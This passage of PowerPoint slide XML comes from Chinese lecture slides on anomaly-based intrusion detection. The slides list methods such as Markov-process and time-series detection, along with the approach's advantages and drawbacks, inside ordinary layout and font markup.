          <p:nvSpPr>
            <p:cNvPr id="86" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{700ED1A9-19EB-746E-9F37-246B2FDB6AD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="422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rPr>
                <a:t>难以确定各元素的权重</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87" name="组合 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16BD625E-6C15-D260-4E4D-6C5E1D293286}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="88" name="图片 87">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0DE6C47-60C4-038C-3F92-C6942C614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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815A4F9F-6E44-FCB6-AD0D-D9347483B21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2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="90" name="组合 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFF2DFE-7065-CE2C-955E-F8F913E38A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="5618710"/>
            <a:ext cx="3891280" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6128" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A06E734C-556C-58E3-3FE9-5273968BB44C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="5183"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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>无法利用已有的经验和知识</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="92" name="组合 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D3D8FE-C7EC-6EEE-6365-E36C1E813657}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="93" name="图片 92">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{128A263E-93B9-E94A-42CE-293C1D9D52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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA9B8923-7A12-1D3F-0A38-6DB4F68CFF25}"/>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rPr>
                  <a:t>3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="图片 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0A70E2-D5C5-06CC-CD5F-7D2059120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06" y="3939118"/>
            <a:ext cx="2757857" cy="1840007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA12D111-A87A-4B6B-BBCD-31422334EDF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="方正正大黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正正大黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="方正正大黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正正大黑简体" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>异常检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349812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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3373247" y="2977854"/>
            <a:ext cx="633412" cy="531812"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
              <a:gd name="adj2" fmla="val 57269"/>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panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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其它异常检测方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD177DF3-21B0-FC7B-614C-E8C43250A66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1902576" y="2405203"/>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模式预测异常检测</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRP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1" name="组合 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD9BDD0-5946-5F6B-B812-F57888F8AE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1925520" y="3005287"/>
            <a:ext cx="957580" cy="957580"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F8797E3-82DA-9775-185D-E138D23E9B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711947" y="3819555"/>
            <a:ext cx="531368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马尔可夫过程异常检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FFEE54-351A-D541-1D88-AE6C307B93AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729828" y="3193539"/>
            <a:ext cx="86779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数据挖掘异常检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="76" name="组合 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7B7A76D-F2BF-03CE-6854-04B0DA34EC3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1914656" y="3703966"/>
            <a:ext cx="976673" cy="957580"/>
            <a:chOff x="3713" y="3122"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="96" name="图片 95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B1198A-ADB2-7E87-91D7-F316D7767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97" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E918992-19F0-3E07-2B11-5450DAB62AC1}"/>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nvGrpSpPr>
          <p:cNvPr id="98" name="组合 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C00C7573-3724-67FD-50D5-C4628ACD3DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1929627" y="4329075"/>
            <a:ext cx="5048885" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="7951" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="99" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD88F40A-FC36-FC01-5C88-09E4C28C6378}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="671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时间序列分析异常检测</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="100" name="组合 99">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{469E1ED1-5D24-2EE9-B6FB-98B2724ED6F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="101" name="图片 100">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1640CB16-7338-8946-B2FD-5FB4DA372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102" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4036087-ED40-6CED-E789-E82C82B1FDBD}"/>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103" name="组合 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBCDC30A-22D8-6414-A616-EA01A84628D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1929627" y="4925227"/>
            <a:ext cx="5048885" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="7951" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DF85F8-AB8C-9482-004D-8E6A57506E2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="671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en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>……</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="106" name="组合 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{503CC917-393A-82B5-B872-CF5822A0DA36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="107" name="图片 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C9E6BA-8955-984E-005F-9F053A5F9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108" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F399757B-6A81-3C5D-1824-FC66461F4C3E}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="115" name="图片 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CB772D6-0642-3D89-AB03-909914097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939" y="3939118"/>
            <a:ext cx="2757857" cy="1840007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1779E073-83A0-412F-939C-4D1CDC02ECF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40815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9F413645-22F3-234C-6757-7AA5FDF58B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2290731" y="2475072"/>
            <a:ext cx="1118136" cy="813758"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8A2A40-7143-E316-8A4B-4738C312DBA4}"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35A9F91A-BC74-49A2-9403-DD2F31155EFE}"/>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5" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6A3BFD-1B82-8136-F48B-9B2FDB40688D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860799" y="3293024"/>
              <a:ext cx="1109128" cy="41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62" name="组合 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE67CC7-62EE-2655-3B8B-A4EA4294A22D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="951100" y="3488839"/>
            <a:ext cx="4315460" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6796" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65D61238-5635-4F21-B328-C080A470827D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="585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能检测新的网络入侵</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2000" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66" name="组合 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BC2094-EFE7-27FD-0FF2-A0ABEE7978DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="68" name="图片 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D03CDD8-92C5-AEC2-1667-37CB7206D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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F32569-BCC8-EB0E-AAAD-40C8056FCBD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sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E036500B-0691-8C71-FD46-28764DC1E199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1553755" y="4236488"/>
            <a:ext cx="4186420" cy="3956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较少依赖于特定的主机操作系统</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2000" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="组合 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F25C47D-8F1E-7290-F164-170314524B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="971422" y="4050810"/>
            <a:ext cx="876936" cy="830580"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="73" name="图片 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34500C01-7DB6-4D58-E00A-54E057772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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9327C35-87FC-7429-3ABE-C6900FA4441C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9170" y="4221"/>
              <a:ext cx="241" cy="711"/>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nvGrpSpPr>
          <p:cNvPr id="77" name="组合 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F547FBB7-A485-2CBA-94E4-315311DFC439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7657910" y="2494703"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
